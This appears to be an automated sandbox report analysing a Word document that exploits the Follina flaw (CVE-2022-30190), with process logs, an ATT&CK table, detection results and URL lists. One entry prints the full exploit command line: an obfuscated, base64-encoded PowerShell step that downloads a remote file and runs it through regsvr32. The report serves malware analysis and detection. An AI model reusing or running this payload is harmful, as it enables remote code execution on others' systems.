        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msdt.exe - Window / User API: threadDelayed 1632
Source: C:\Windows\SysWOW64\msdt.exe - Window / User API: threadDelayed 665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE - Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe (listed twice in the original report)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE - Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE - Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation (2 identical entries)
Source: C:\Windows\SysWOW64\msdt.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (listed per tactic column; a number in parentheses is the count of matching signatures shown next to that technique)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (12); At (Linux); At (Windows); Cron
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading (11); Process Injection (11); DLL Side-Loading (1); Binary Padding; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Query Registry (1); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph (ID: 640804; Sample: doc1712.docx; Startdate: 07/06/2022; Architecture: WINDOWS; Score: 72)

Signatures attached to the sample node: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Yara detected Microsoft Office Exploit Follina CVE-2022-30190; 2 other signatures

Process tree recovered from the graph (the per-node counters drawn in the graph, e.g. "74 63", are kept verbatim in parentheses):

• WINWORD.EXE (74 63), started
  • contacts 45.32.185.177, 49754, 49765, 80 (AS-CHOOPAUS, United States)
  • dropped: C:\Users\user\AppData\Local\...\123[1].RES (HTML); C:\Users\user\AppData\Local\...\7F7F7060.htm (HTML); C:\Users\user\AppData\Local\...\1FD46902.htm (HTML)
  • msdt.exe (21), started; dropped: C:\Windows\Temp\...\DiagPackage.dll.mui (PE32); C:\Windows\Temp\...\DiagPackage.dll (PE32+)
  • MSOSYNC.EXE (5 12), started
  • MSOSYNC.EXE (2 3), started
• csc.exe (3), started; dropped: C:\Users\user\AppData\Local\...\ddzr0cba.dll (PE32)
  • cvtres.exe (1), started
• csc.exe (3), started; dropped: C:\Users\user\AppData\Local\...\qe5jzpda.dll (PE32)
  • cvtres.exe (1), started
• 2 other processes; dropped: C:\Users\user\AppData\Local\...\xwo13jpt.dll (PE32)
  • cvtres.exe (1), started

Antivirus, Machine Learning and Genetic Malware Detection

Submitted file:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| doc1712.docx | 23% | Virustotal | |
| doc1712.docx | 11% | Metadefender | |

Dropped files:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll | 0% | Metadefender | |
| C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll | 0% | ReversingLabs | |
| C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui | 0% | Metadefender | |
| C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui | 0% | ReversingLabs | |

No Antivirus matches (reported for two further categories)

URLs:

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://roaming.edog. | 0% | URL Reputation | safe |
| https://cdn.entity. | 0% | URL Reputation | safe |
| https://powerlift.acompli.net | 0% | URL Reputation | safe |
| https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
| https://cortana.ai | 0% | URL Reputation | safe |
| https://api.aadrm.com/ | 0% | URL Reputation | safe |
| https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe |
| https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe |
| https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
| https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
| https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe |
| https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
| https://api.aadrm.com | 0% | URL Reputation | safe |
| https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
| https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
| https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
| https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
| https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
| https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
| https://ncus.contentsync. | 0% | URL Reputation | safe |
| https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
| https://wus2.contentsync. | 0% | URL Reputation | safe |
| https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe |
| https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
| https://ncus.pagecontentsync. | 0% | URL Reputation | safe |
| https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe |
| https://dataservice.o365filtering.com | 0% | URL Reputation | safe |
No contacted domains info

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://login.microsoftonline.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://shell.suite.office.com:1443 | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://autodiscover-s.outlook.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://roaming.edog. | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://cdn.entity. | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://powerlift.acompli.net | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://cortana.ai | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://cloudfiles.onenote.com/upload.aspx | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://entitlement.diagnosticssdf.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://api.aadrm.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://api.microsoftstream.com/api/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://cr.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | Avira URL Cloud: safe | low
https://portal.office.com/account/?ref=ClientMeControl | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://graph.ppe.windows.net | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://res.getmicrosoftkey.com/api/redemptionevents | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://officeci.azurewebsites.net/api/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://store.office.cn/addinstemplate | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://api.aadrm.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://globaldisco.crm.dynamics.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://messaging.engagement.office.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://dev0-api.acompli.net/autodetect | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://api.diagnosticssdf.office.com/v2/feedback | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://api.powerbi.com/v1.0/myorg/groups | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://web.microsoftstream.com/video/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://api.addins.store.officeppe.com/addinstemplate | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://dataservice.o365filtering.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://prod-global-autodetect.acompli.net/autodetect | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://ncus.contentsync. | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
http://weather.service.msn.com/data.aspx | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://apis.live.net/v5.0/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://management.azure.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://outlook.office365.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://wus2.contentsync. | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://clients.config.office.net/user/v1.0/ios | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://insertmedia.bing.office.net/odc/insertmedia | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://o365auditrealtimeingestion.manage.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://outlook.office365.com/api/v1.0/me/Activities | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://api.office.net | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://incidents.diagnosticssdf.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://asgsmsproxyapi.azurewebsites.net/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://entitlement.diagnostics.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://substrate.office.com/search/api/v2/init | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://outlook.office.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://storage.live.com/clientlogs/uploadlocation | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://outlook.office365.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://webshell.suite.office.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://substrate.office.com/search/api/v1/SearchHistory | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://management.azure.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
